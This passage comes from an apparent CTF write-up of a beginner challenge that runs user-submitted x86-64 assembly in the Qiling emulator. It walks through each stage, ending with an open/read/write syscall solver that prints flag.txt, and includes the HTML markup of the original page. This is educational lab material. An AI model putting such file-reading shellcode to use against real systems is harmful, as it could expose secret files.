string\">\"rbp\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rip<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rip\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rsp<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">)</span>\n\n\n<span class=\"token keyword\">if</span> __name__ <span class=\"token operator\">==</span> <span class=\"token string\">\"__main__\"</span><span class=\"token punctuation\">:</span>\n    app<span class=\"token punctuation\">.</span>run<span class=\"token punctuation\">(</span>host<span class=\"token operator\">=</span><span class=\"token string\">\"0.0.0.0\"</span><span class=\"token punctuation\">,</span> port<span class=\"token operator\">=</span><span class=\"token number\">8080</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>As you can see from this code, the input assembly code (only mov, push, and syscall are allowed; maximum 25 lines) is assembled into binary using <code class=\"language-text\">asm(code, arch=\"amd64\", os=\"linux\")</code> and executed by Qiling.</p>\n<p>The 
application has four stages in total; reaching Stage 4 makes flag.txt readable.</p>\n<h3 id=\"setting-up-a-local-environment\" style=\"position:relative;\"><a href=\"#setting-up-a-local-environment\" aria-label=\"setting up a local environment permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Setting Up a Local Environment</h3>\n<p>First, I set up a local testing environment using the provided Dockerfile.</p>\n<p>In my environment, <code class=\"language-text\">docker-compose build</code> failed with a <code class=\"language-text\">TypeError: HTTPConnection.request() got an unexpected keyword argument 'chunked'</code> error, so I’m noting the workaround here.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">docker-compose</span> build\nTraceback <span class=\"token punctuation\">(</span>most recent call last<span class=\"token punctuation\">)</span>:\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/docker/api/client.py\"</span>, line <span class=\"token number\">214</span>, <span class=\"token keyword\">in</span> _retrieve_server_version\n    <span class=\"token builtin class-name\">return</span> self.version<span class=\"token punctuation\">(</span>api_version<span class=\"token operator\">=</span>False<span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"ApiVersion\"</span><span class=\"token 
punctuation\">]</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/docker/api/daemon.py\"</span>, line <span class=\"token number\">181</span>, <span class=\"token keyword\">in</span> version\n    <span class=\"token builtin class-name\">return</span> self._result<span class=\"token punctuation\">(</span>self._get<span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>, <span class=\"token assign-left variable\">json</span><span class=\"token operator\">=</span>True<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/docker/utils/decorators.py\"</span>, line <span class=\"token number\">46</span>, <span class=\"token keyword\">in</span> inner\n    <span class=\"token builtin class-name\">return</span> f<span class=\"token punctuation\">(</span>self, *args, **kwargs<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/docker/api/client.py\"</span>, line <span class=\"token number\">237</span>, <span class=\"token keyword\">in</span> _get\n    <span class=\"token builtin class-name\">return</span> self.get<span class=\"token punctuation\">(</span>url, **self._set_request_timeout<span class=\"token punctuation\">(</span>kwargs<span class=\"token punctuation\">))</span>\n  File <span class=\"token string\">\"/usr/local/lib/python3.10/dist-packages/requests/sessions.py\"</span>, line <span class=\"token number\">600</span>, <span class=\"token keyword\">in</span> get\n    <span class=\"token builtin class-name\">return</span> self.request<span class=\"token punctuation\">(</span><span class=\"token string\">\"GET\"</span>, url, **kwargs<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/local/lib/python3.10/dist-packages/requests/sessions.py\"</span>, line <span class=\"token number\">587</span>, <span class=\"token keyword\">in</span> request\n    resp <span 
class=\"token operator\">=</span> self.send<span class=\"token punctuation\">(</span>prep, **send_kwargs<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/local/lib/python3.10/dist-packages/requests/sessions.py\"</span>, line <span class=\"token number\">701</span>, <span class=\"token keyword\">in</span> send\n    r <span class=\"token operator\">=</span> adapter.send<span class=\"token punctuation\">(</span>request, **kwargs<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/local/lib/python3.10/dist-packages/requests/adapters.py\"</span>, line <span class=\"token number\">486</span>, <span class=\"token keyword\">in</span> send\n    resp <span class=\"token operator\">=</span> conn.urlopen<span class=\"token punctuation\">(</span>\n  File <span class=\"token string\">\"/usr/local/lib/python3.10/dist-packages/urllib3/connectionpool.py\"</span>, line <span class=\"token number\">790</span>, <span class=\"token keyword\">in</span> urlopen\n    response <span class=\"token operator\">=</span> self._make_request<span class=\"token punctuation\">(</span>\n  File <span class=\"token string\">\"/usr/local/lib/python3.10/dist-packages/urllib3/connectionpool.py\"</span>, line <span class=\"token number\">496</span>, <span class=\"token keyword\">in</span> _make_request\n    conn.request<span class=\"token punctuation\">(</span>\nTypeError: HTTPConnection.request<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> got an unexpected keyword argument <span class=\"token string\">'chunked'</span>\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback <span class=\"token punctuation\">(</span>most recent call last<span class=\"token punctuation\">)</span>:\n  File <span class=\"token string\">\"/usr/bin/docker-compose\"</span>, line <span class=\"token number\">33</span>, <span class=\"token keyword\">in</span> <span class=\"token 
operator\">&lt;</span>module<span class=\"token operator\">></span>\n    sys.exit<span class=\"token punctuation\">(</span>load_entry_point<span class=\"token punctuation\">(</span><span class=\"token string\">'docker-compose==1.29.2'</span>, <span class=\"token string\">'console_scripts'</span>, <span class=\"token string\">'docker-compose'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">))</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/compose/cli/main.py\"</span>, line <span class=\"token number\">81</span>, <span class=\"token keyword\">in</span> main\n    command_func<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/compose/cli/main.py\"</span>, line <span class=\"token number\">200</span>, <span class=\"token keyword\">in</span> perform_command\n    project <span class=\"token operator\">=</span> project_from_options<span class=\"token punctuation\">(</span><span class=\"token string\">'.'</span>, options<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/compose/cli/command.py\"</span>, line <span class=\"token number\">60</span>, <span class=\"token keyword\">in</span> project_from_options\n    <span class=\"token builtin class-name\">return</span> get_project<span class=\"token punctuation\">(</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/compose/cli/command.py\"</span>, line <span class=\"token number\">152</span>, <span class=\"token keyword\">in</span> get_project\n    client <span class=\"token operator\">=</span> get_client<span class=\"token punctuation\">(</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/compose/cli/docker_client.py\"</span>, line <span class=\"token number\">41</span>, <span class=\"token 
keyword\">in</span> get_client\n    client <span class=\"token operator\">=</span> docker_client<span class=\"token punctuation\">(</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/compose/cli/docker_client.py\"</span>, line <span class=\"token number\">170</span>, <span class=\"token keyword\">in</span> docker_client\n    client <span class=\"token operator\">=</span> APIClient<span class=\"token punctuation\">(</span>use_ssh_client<span class=\"token operator\">=</span>not use_paramiko_ssh, **kwargs<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/docker/api/client.py\"</span>, line <span class=\"token number\">197</span>, <span class=\"token keyword\">in</span> __init__\n    self._version <span class=\"token operator\">=</span> self._retrieve_server_version<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/docker/api/client.py\"</span>, line <span class=\"token number\">221</span>, <span class=\"token keyword\">in</span> _retrieve_server_version\n    raise DockerException<span class=\"token punctuation\">(</span>\ndocker.errors.DockerException: Error <span class=\"token keyword\">while</span> fetching server API version: HTTPConnection.request<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> got an unexpected keyword argument <span class=\"token string\">'chunked'</span></code></pre></div>\n<p>Since the above error appeared, I resolved it by downgrading the requests package to version 2.29.0 as shown below.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">pip <span class=\"token function\">install</span> <span class=\"token assign-left variable\">requests</span><span class=\"token operator\">==</span><span class=\"token number\">2.29</span>.0</code></pre></div>\n<p>As 
noted in the issue below, this error is caused by a compatibility problem with the requests package.</p>\n<p>Reference: <a href=\"https://github.com/docker/docker-py/issues/3113\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">urllib3 v2 incompatibility · Issue #3113 · docker/docker-py</a></p>\n<h3 id=\"stage-1-stage-2\" style=\"position:relative;\"><a href=\"#stage-1-stage-2\" aria-label=\"stage 1 stage 2 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Stage 1, Stage 2</h3>\n<p>First, I’ll clear Stage 1 and Stage 2.</p>\n<p>Stage 1 is cleared by setting RAX to 0x123, and Stage 2 by placing 0x123 on the top of the stack.</p>\n<p>By executing the following assembly code in sequence, I was able to advance to Stage 3.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">mov rax,0x123\npush rax</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/36d70c9a9cce9027cd901571c07d8345/afd0b/image-20240616105855558.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 73.33333333333334%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/36d70c9a9cce9027cd901571c07d8345/8ac56/image-20240616105855558.webp 240w,\n/static/36d70c9a9cce9027cd901571c07d8345/d3be9/image-20240616105855558.webp 480w,\n/static/36d70c9a9cce9027cd901571c07d8345/e46b2/image-20240616105855558.webp 960w,\n/static/36d70c9a9cce9027cd901571c07d8345/99eb3/image-20240616105855558.webp 1153w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/36d70c9a9cce9027cd901571c07d8345/8ff5a/image-20240616105855558.png 240w,\n/static/36d70c9a9cce9027cd901571c07d8345/e85cb/image-20240616105855558.png 480w,\n/static/36d70c9a9cce9027cd901571c07d8345/d9199/image-20240616105855558.png 960w,\n/static/36d70c9a9cce9027cd901571c07d8345/afd0b/image-20240616105855558.png 1153w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/36d70c9a9cce9027cd901571c07d8345/d9199/image-20240616105855558.png\"\n            alt=\"image-20240616105855558\"\n            title=\"image-20240616105855558\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"stage-3\" style=\"position:relative;\"><a href=\"#stage-3\" aria-label=\"stage 3 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 
9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Stage 3</h3>\n<p>The clear condition for Stage 3 was to print the string <code class=\"language-text\">Hello</code> to standard output.</p>\n<p>This condition was cleared with the following assembly code.</p>\n<p>This code loads RBX with 0x6f6c6c6548, which is the five bytes of <code class=\"language-text\">Hello</code> read as a little-endian integer (written out in hex they appear reversed, as <code class=\"language-text\">olleH</code>), pushes it so the string sits at the top of the stack, passes that address in RSI with a length of 5 in RDX, and invokes syscall number 1 (write) with RDI = 1 (stdout) to print <code class=\"language-text\">Hello</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">mov rax, <span class=\"token number\">1</span>\nmov rdi, <span class=\"token number\">1</span>\nmov rbx, 0x6f6c6c6548\npush rbx\nmov rsi, rsp\nmov rdx, <span class=\"token number\">5</span>\nsyscall</code></pre></div>\n<p>Reference: <a href=\"https://manpages.debian.org/unstable/manpages-dev/write.2.en.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">write(2) — manpages-dev — Debian unstable — Debian Manpages</a></p>\n<p>Reference: <a href=\"https://filippo.io/linux-syscall-table/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Searchable Linux Syscall Table for x86_64</a></p>\n<p>The solution itself is simple, but there were several pitfalls I encountered on the way to this assembly code.</p>\n<p>First, in my initial code I tried to push the immediate value 0x6f6c6c6548 onto the stack with <code class=\"language-text\">push 0x6f6c6c6548</code>, which produced the following error.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token punctuation\">[</span>ERROR<span class=\"token punctuation\">]</span> There was an error running <span class=\"token punctuation\">[</span><span class=\"token 
string\">'/usr/bin/x86_64-linux-gnu-as'</span>, <span class=\"token string\">'-64'</span>, <span class=\"token string\">'-o'</span>, <span class=\"token string\">'/tmp/pwn-asm-ong0t78p/step2'</span>, <span class=\"token string\">'/tmp/pwn-asm-ong0t78p/step1'</span><span class=\"token punctuation\">]</span>:\n    It had the exitcode <span class=\"token number\">1</span>.\n    It had this on stdout:\n    /tmp/pwn-asm-ong0t78p/step1: Assembler messages:\n    /tmp/pwn-asm-ong0t78p/step1:10: Error: operand <span class=\"token builtin class-name\">type</span> mismatch <span class=\"token keyword\">for</span> <span class=\"token variable\"><span class=\"token variable\">`</span>push<span class=\"token string\">'\n\n[ERROR] An error occurred while assembling:\n       1: .section .shellcode,\"awx\"\n       2: .global _start\n       3: .global __start\n       4: .p2align 2\n       5: _start:\n       6: __start:\n       7: .intel_syntax noprefix\n       8: mov rax, 1\n       9: mov rdi, 1\n      10: push 0x6f6c6c6548\n      11: mov rsi, rsp\n      12: mov rdx, 9\n      13: syscall\n    Traceback (most recent call last):\n      File \"/usr/local/lib/python3.10/dist-packages/pwnlib/asm.py\", line 701, in asm\n        _run(assembler + ['</span>-o<span class=\"token string\">', step2, step1])\n      File \"/usr/local/lib/python3.10/dist-packages/pwnlib/asm.py\", line 419, in _run\n        log.error(msg, *args)\n      File \"/usr/local/lib/python3.10/dist-packages/pwnlib/log.py\", line 439, in error\n        raise PwnlibException(message % args)\n    pwnlib.exception.PwnlibException: There was an error running ['</span>/usr/bin/x86_64-linux-gnu-as<span class=\"token string\">', '</span>-64<span class=\"token string\">', '</span>-o<span class=\"token string\">', '</span>/tmp/pwn-asm-ong0t78p/step2<span class=\"token string\">', '</span>/tmp/pwn-asm-ong0t78p/step1'<span class=\"token punctuation\">]</span>:\n    It had the exitcode <span class=\"token number\">1</span>.\n    It had 
this on stdout:\n    /tmp/pwn-asm-ong0t78p/step1: Assembler messages:\n    /tmp/pwn-asm-ong0t78p/step1:10: Error: operand <span class=\"token builtin class-name\">type</span> mismatch <span class=\"token keyword\">for</span> <span class=\"token variable\">`</span></span>push'</code></pre></div>\n<p>This error occurs because the push instruction does not support 64-bit immediate operands.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 505px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/78bd6dc3dbff13fe3c95fa69176143b6/c0cb9/image-20240616112338492.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/78bd6dc3dbff13fe3c95fa69176143b6/8ac56/image-20240616112338492.webp 240w,\n/static/78bd6dc3dbff13fe3c95fa69176143b6/d3be9/image-20240616112338492.webp 480w,\n/static/78bd6dc3dbff13fe3c95fa69176143b6/c5db7/image-20240616112338492.webp 505w\"\n              sizes=\"(max-width: 505px) 100vw, 505px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/78bd6dc3dbff13fe3c95fa69176143b6/8ff5a/image-20240616112338492.png 240w,\n/static/78bd6dc3dbff13fe3c95fa69176143b6/e85cb/image-20240616112338492.png 480w,\n/static/78bd6dc3dbff13fe3c95fa69176143b6/c0cb9/image-20240616112338492.png 505w\"\n            sizes=\"(max-width: 505px) 100vw, 505px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/78bd6dc3dbff13fe3c95fa69176143b6/c0cb9/image-20240616112338492.png\"\n            alt=\"image-20240616112338492\"\n            title=\"image-20240616112338492\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reference: <a href=\"https://www.felixcloutier.com/x86/push\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">PUSH — Push Word, Doubleword, or Quadword Onto the Stack</a></p>\n<p>Reference: <a href=\"https://github.com/Gallopsled/pwntools/issues/1228\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Does pwntools cannot asm() format like ” push 64bit-number” · Issue #1228 · Gallopsled/pwntools</a></p>\n<p>As a result, using <code class=\"language-text\">push 0x6c6c6548</code> in the same assembly code to output the string <code class=\"language-text\">Hell</code> was possible.</p>\n<p>To work around this limitation, I first load the value into a general-purpose register and then push that register, storing the 64-bit value on the stack top.</p>\n<p>Incidentally, the reason for not doing it the following way is that a 64-bit slot would be allocated on the stack regardless, making the actually outputted string <code class=\"language-text\">Hell\\x00\\x00o</code> instead of <code class=\"language-text\">Hello</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">push 0x0000006f\npush 0x6c6c6548</code></pre></div>\n<h3 id=\"stage-4\" style=\"position:relative;\"><a href=\"#stage-4\" aria-label=\"stage 4 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 
4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Stage 4</h3>\n<p>Now that I’ve reached Stage 4, it’s finally time to retrieve the flag.</p>\n<p>As can be seen from the challenge code, upon reaching Stage 4, flag.txt is created inside a directory named with a random UUID.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">dirname <span class=\"token operator\">=</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>uuid<span class=\"token punctuation\">.</span>uuid4<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\nos<span class=\"token punctuation\">.</span>mkdir<span class=\"token punctuation\">(</span>dirname<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">if</span> session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"4\"</span><span class=\"token punctuation\">:</span>\n    f <span class=\"token operator\">=</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>os<span class=\"token punctuation\">.</span>path<span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span>dirname<span class=\"token punctuation\">,</span> <span class=\"token string\">\"flag.txt\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"w\"</span><span class=\"token punctuation\">)</span>\n    flag <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>environ<span class=\"token 
punctuation\">.</span>get<span class=\"token punctuation\">(</span><span class=\"token string\">\"FLAG\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"ctf4b{fake_flag}\"</span><span class=\"token punctuation\">)</span>\n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\n    f<span class=\"token punctuation\">.</span>close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nql <span class=\"token operator\">=</span> Qiling<span class=\"token punctuation\">(</span>\n    code<span class=\"token operator\">=</span>asm_code<span class=\"token punctuation\">,</span>\n    rootfs<span class=\"token operator\">=</span>dirname<span class=\"token punctuation\">,</span>\n    archtype<span class=\"token operator\">=</span>QL_ARCH<span class=\"token punctuation\">.</span>X8664<span class=\"token punctuation\">,</span>\n    ostype<span class=\"token operator\">=</span>QL_OS<span class=\"token punctuation\">.</span>LINUX<span class=\"token punctuation\">,</span>\n    verbose<span class=\"token operator\">=</span>QL_VERBOSE<span class=\"token punctuation\">.</span>DEFAULT<span class=\"token punctuation\">,</span>\n    log_file<span class=\"token operator\">=</span>logpath<span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">)</span></code></pre></div>\n<p>As indicated by the <code class=\"language-text\">rootfs=dirname</code> argument to Qiling, this directory serves as the root filesystem during execution.</p>\n<p>Reference: <a href=\"https://docs.qiling.io/en/latest/qltool/#run-options\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">qltool - Qiling Framework Documentation</a></p>\n<p>Therefore, we can obtain the flag simply by opening flag.txt, reading its contents, and printing them.</p>\n<p>The solver is as follows.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre 
class=\"language-bash\"><code class=\"language-bash\">mov rax, 0x7478742e67616c66\npush 0x0\npush rax\nmov rax, <span class=\"token number\">2</span>\nmov rdi, rsp\nmov rsi, <span class=\"token number\">0</span>\nmov rdx, <span class=\"token number\">0</span>\nsyscall\n\nmov rdi, rax\nmov rax, <span class=\"token number\">0</span>\nmov rsi, rsp\nmov rdx, <span class=\"token number\">53</span>\nsyscall\n\nmov rax, <span class=\"token number\">1</span>\nmov rdi, <span class=\"token number\">1</span>\nmov rsi, rsp\nmov rdx, <span class=\"token number\">53</span>\nsyscall</code></pre></div>\n<p>The system calls used, in order from top to bottom, are open, read, and write.</p>\n<p>This allowed me to identify the correct flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b22abdcaae0658056c62601c0f3aa594/fe238/image-20240615155952218.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 68.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b22abdcaae0658056c62601c0f3aa594/8ac56/image-20240615155952218.webp 240w,\n/static/b22abdcaae0658056c62601c0f3aa594/d3be9/image-20240615155952218.webp 480w,\n/static/b22abdcaae0658056c62601c0f3aa594/e46b2/image-20240615155952218.webp 960w,\n/static/b22abdcaae0658056c62601c0f3aa594/9d46a/image-20240615155952218.webp 1401w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            
srcset=\"/static/b22abdcaae0658056c62601c0f3aa594/8ff5a/image-20240615155952218.png 240w,\n/static/b22abdcaae0658056c62601c0f3aa594/e85cb/image-20240615155952218.png 480w,\n/static/b22abdcaae0658056c62601c0f3aa594/d9199/image-20240615155952218.png 960w,\n/static/b22abdcaae0658056c62601c0f3aa594/fe238/image-20240615155952218.png 1401w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b22abdcaae0658056c62601c0f3aa594/d9199/image-20240615155952218.png\"\n            alt=\"image-20240615155952218\"\n            title=\"image-20240615155952218\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>If the assembly code doesn’t behave as expected, it’s helpful to change the verbose value to <code class=\"language-text\">QL_VERBOSE.DEBUG</code> and test locally.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">ql <span class=\"token operator\">=</span> Qiling<span class=\"token punctuation\">(</span>\n    code<span class=\"token operator\">=</span>asm_code<span class=\"token punctuation\">,</span>\n    rootfs<span class=\"token operator\">=</span>dirname<span class=\"token punctuation\">,</span>\n    archtype<span class=\"token operator\">=</span>QL_ARCH<span class=\"token punctuation\">.</span>X8664<span class=\"token punctuation\">,</span>\n    ostype<span class=\"token operator\">=</span>QL_OS<span class=\"token punctuation\">.</span>LINUX<span class=\"token punctuation\">,</span>\n    verbose<span class=\"token operator\">=</span>QL_VERBOSE<span class=\"token punctuation\">.</span>DEBUG<span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Enabling debug 
mode allows you to easily view detailed information such as system call invocations and their results, as shown below, which is very helpful.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/78f2f657426df1b560115864ec16bc73/faa22/image-20240616114006163.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 28.333333333333332%; position: relative; bottom: 0; left: 0; background-image: 